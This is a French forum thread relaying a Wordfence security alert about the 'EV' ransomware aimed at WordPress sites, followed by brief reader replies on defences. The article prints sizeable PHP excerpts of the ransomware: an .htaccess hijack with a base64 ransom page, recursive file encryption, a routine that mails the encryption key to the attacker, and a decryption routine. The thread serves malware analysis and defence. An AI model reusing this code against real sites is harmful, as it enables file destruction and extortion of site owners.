IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Alerte sécurité : le ransomware EV, une menace grandissante pour les sites WordPress


Sujet :

Sécurité

  1. #1
    Chroniqueur Actualités
    Avatar de Patrick Ruiz
    Homme Profil pro
    Redacteur web
    Inscrit en
    Février 2017
    Messages
    2 100
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Redacteur web
    Secteur : Communication - Médias

    Informations forums :
    Inscription : Février 2017
    Messages : 2 100
    Points : 56 644
    Points
    56 644
    Par défaut Alerte sécurité : le ransomware EV, une menace grandissante pour les sites WordPress
    Alerte sécurité : le ransomware EV, une menace grandissante pour les sites WordPress
    Depuis le mois dernier

    Wordfence, l’équipe en charge de la sécurité des sites WordPress, vient de publier une alerte sécurité. Elle fait état de ce qu’un ransomware surnommé EV (par l’équipe Wordfence) cible de plus en plus les sites WordPress. La deuxième version (dont le code source a été publié sur GitHub depuis juillet 2016) est utilisée par des attaquants pour essayer de s’en prendre à des sites WordPress depuis le mois passé.

    Un examen du code source révèle que l’attaque commence par une prise en otage du fichier .htaccess (comme en témoigne le bout de code source ci-dessous) créé automatiquement par WordPress lors de l’installation d’un site. Le fichier .htaccess étant renommé, le site est pratiquement muselé, puisque le serveur se retrouve orphelin de son fichier de configuration. Ne reste alors qu’à mettre les fichiers du site hors d’atteinte par la victime.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    public function shcpackInstall(){
        if(!file_exists(".htashor7cut")){
          rename(".htaccess", ".htashor7cut");
          if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex shor7cut.php\r\nErrorDocument 404 /shor7cut.php")){
                echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
          }
          if(file_put_contents("shor7cut.php", base64_decode("PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgPHRpdGxlPkF3ZXNvbWVXYXJlPC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCiAgICBiYWNrZ3JvdW5kOiAjMUExQzFGOw0KICAgIGNvbG9yOiAjZTJlMmUyOw0KfQ0KYXsNCiAgIGNvbG9yOmdyZWVuOw0KfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGNlbnRlcj4NCjxwcmU+DQogICAgICANCiAgICAgICAgICAgIC4tIiItLg0KICAgICAgICAgICAvIC4tLS4gXA0KICAgICAgICAgIC8gLyAgICBcIFwNCiAgICAgICAgICB8IHwgICAgfCB8DQogICAgICAgICAgfCB8Li0iIi0ufA0KICAgICAgICAgLy8vYC46Ojo6LmBcDQogICAgICAgIHx8fCA6Oi8gIFw6OiA7DQogICAgICAgIHx8OyA6OlxfXy86OiA7DQogICAgICAgICBcXFwgJzo6OjonIC8NCiAgICAgICAgICBgPSc6LS4uLSdgDQpZb3VyIHNpdGUgaXMgbG9ja2VkLCBwbGVhc2UgY29udGFjdCB2aWEgZW1haWw6DQogICAgIC1bIDxmb250IGNvbG9yPSJncmVlbiI+dG8xMzM3ZGF5W2F0XWdtYWlsLmNvbTwvZm9udD4gXS0NCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NClRoaXMgaXMgYSBub3RpY2Ugb2YgPGEgaHJlZj0iaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUmFuc29td2FyZSI+cmFuc29td2FyZTwvYT4uPGJyPg0KSG93IHRvIHJlc3RvcmUgdGhlIGJlZ2lubmluZz8NClBsZWFzZSBjb250YWN0IHVzIHZpYSBlbWFpbCBsaXN0ZWQNCjwvcHJlPg0KPC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+"))){
                echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i>  shor7cut.php (Default Page)<br>';
          }
        }
       }

    Le ransomware dispose d’une fonction de parcours (cf. fonction shcdirs ci-dessous) des répertoires de l’arborescence du site et de chiffrement des fichiers en leur sein. Les fichiers sont chiffrés en utilisant l’algorithme Rijndael 128 via un appel à la fonction shcEnCry (cf. code ci-dessous). Pour chacun des répertoires parcourus, l’attaquant reçoit (via un appel à la fonction report ci-dessous) la clé de chiffrement utilisée par courriel via une adresse à configurer d’avance.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    public function shcdirs($dir,$method,$key){
            switch ($method) {
              case '1':
                deRanSomeware::shcpackInstall();
              break;
              case '2':
               deRanSomeware::shcpackUnstall();
              break;
            }
            foreach(scandir($dir) as $d)
            {
                if($d!='.' && $d!='..')
                {
                    $locate = $dir.DIRECTORY_SEPARATOR.$d;
                    if(!is_dir($locate)){
                       if(  deRanSomeware::kecuali($locate,"AwesomeWare.php")  && deRanSomeware::kecuali($locate,".png")  && deRanSomeware::kecuali($locate,".htaccess")  && deRanSomeware::kecuali($locate,"shor7cut.php") &&  deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htashor7cut") ){
                         switch ($method) {
                            case '1':
                               deRanSomeware::shcEnCry($key,$locate);
                               deRanSomeware::shcEnDesDirS($locate,"1");
                            break;
                            case '2':
                               deRanSomeware::shcDeCry($key,$locate);
                               deRanSomeware::shcEnDesDirS($locate,"2");
                            break;
                         }
                       }
                    }else{
                      deRanSomeware::shcdirs($locate,$method,$key);
                    }
                }
                deRanSomeware::plus();
            }
            deRanSomeware::report($key);
       }
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    public function shcEnCry($key,$locate){
          $data = file_get_contents($locate);
          $iv = mcrypt_create_iv(
              mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
              MCRYPT_DEV_URANDOM
          );
          $encrypted = base64_encode(
              $iv .
              mcrypt_encrypt(
                  MCRYPT_RIJNDAEL_128,
                  hash('sha256', $key, true),
                  $data,
                  MCRYPT_MODE_CBC,
                  $iv
              )
          );
          if(file_put_contents($locate,  $encrypted )){
             echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
          }else{
             echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>';
          }
       }
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    public function report($key){
            $message.= "=========     Ronggolawe Ransomware    =========\n";
            $message.= "Website : ".$_SERVER['HTTP_HOST'];
            $message.= "Key     : ".$key;
            $message.= "========= Ronggolawe (2016) Ransomware =========\n";
            $subject = "Report Ransomeware";
            $headers = "From: Ransomware <ransomeware@shor7cut.today>\r\n";
            mail("-- YOUR EMAIL --",$subject,$message,$headers);
       }

    Une fois le processus de chiffrement des fichiers achevé, la victime a droit au classique écran de demande de la rançon via lequel il pourra saisir une clé de chiffrement fournie par les attaquants en cas de paiement de la rançon. L’équipe Wordfence déconseille cependant aux victimes potentielles de procéder au paiement.

    Nom : Ransom screen.png
Affichages : 2957
Taille : 9,4 Ko

    « Le ransomware documenté ici est incomplet parce que la fonction dédiée au déchiffrement des fichiers (cf.fonction shcDeCry ci-dessous) ne joue pas son rôle », a déclaré l’équipe Wordfence qui ajoute que « si vous êtes affecté par ce dernier ne procédez pas au paiement de la rançon puisqu’il est peu probable que les attaquants soient en réalité capables de déchiffrer vos fichiers. »

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
       public function shcDeCry($key,$locate){
          $data = base64_decode( file_get_contents($locate) );
          $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
          $decrypted = rtrim(
              mcrypt_decrypt(
                  MCRYPT_RIJNDAEL_128,
                  hash('sha256', $key, true),
                  substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
                  MCRYPT_MODE_CBC,
                  $iv
              ),
              "\0"
          );
          if(file_put_contents($locate,  $decrypted )){
             echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
          }else{
             echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
          }
       }

    « Quand bien même ils vous fourniraient une clé, vous aurez besoin d’un développeur PHP expérimenté pour vous aider à réparer leur code afin de tirer profit de la clé et déchiffrer les fichiers », a ajouté l’équipe Wordfence.

    Le malheur des potentielles victimes semble faire les affaires de l’équipe managériale de WordPress puisque la seule solution proposée par cette dernière est de se doter du pare-feu Wordfence disponible uniquement pour les utilisateurs premium.

    Sources  : Wordfence, GitHub

    Et vous ?

    Qu’en pensez-vous ?
    Développez-vous des sites avec WordPress ? Quelles précautions comptez-vous prendre pour éviter d’être victime de cette menace ?

    Voir aussi :

    WordPress est de loin le CMS le plus ciblé par les cyberattaques en grande partie en raison du mauvais entretien et la négligence des webmasters

  2. #2
    Membre confirmé
    Homme Profil pro
    nope
    Inscrit en
    Décembre 2012
    Messages
    122
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Loiret (Centre)

    Informations professionnelles :
    Activité : nope

    Informations forums :
    Inscription : Décembre 2012
    Messages : 122
    Points : 463
    Points
    463
    Par défaut
    Je n'ai pas compris comment le fichier atterrissait sur le site Wordpress (je suppose un plug-in verollé ?)

    Après pour un CMS, tant que l'on ne touche pas à la BDD, avoir les fichiers cryptés n'est pas un gros problème en soit, il suffit d'avoir une sauvegarde et de la restaurer.

    Il peut y avoir un problème sur des images ou des PJ, mais le site en lui-même ne doit pas rester inaccessible bien longtemps .

    Pour le reste, modifier les accès au fichier .htaccess semble résoudre une partie du problème.

  3. #3
    Invité
    Invité(e)
    Par défaut
    On pourrai simplement bloqué la fonction "scandir" et ça règle le problème, pour autant bien sûr quelle ne soit pas utilisée dans WordPress.

  4. #4
    Membre confirmé
    Homme Profil pro
    Développeur .NET
    Inscrit en
    Janvier 2011
    Messages
    204
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 34
    Localisation : Suisse

    Informations professionnelles :
    Activité : Développeur .NET

    Informations forums :
    Inscription : Janvier 2011
    Messages : 204
    Points : 511
    Points
    511
    Par défaut
    Ça manque de détails. Comment ce ransomware se propage-t-il ? Via une faille ? Un extension vérolée ? Que signifie prendre en otage le fichier .htaccess ?

Discussions similaires

  1. Réponses: 4
    Dernier message: 29/09/2006, 12h53
  2. y'a t'il une date limite pour les anciens jeux ?
    Par Asmod_D dans le forum Développement 2D, 3D et Jeux
    Réponses: 2
    Dernier message: 09/07/2006, 02h47
  3. Réponses: 2
    Dernier message: 14/06/2006, 11h34
  4. Réponses: 3
    Dernier message: 13/06/2006, 15h52
  5. Une petite aide pour les API ?
    Par Yop dans le forum Windows
    Réponses: 2
    Dernier message: 04/04/2002, 22h45

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo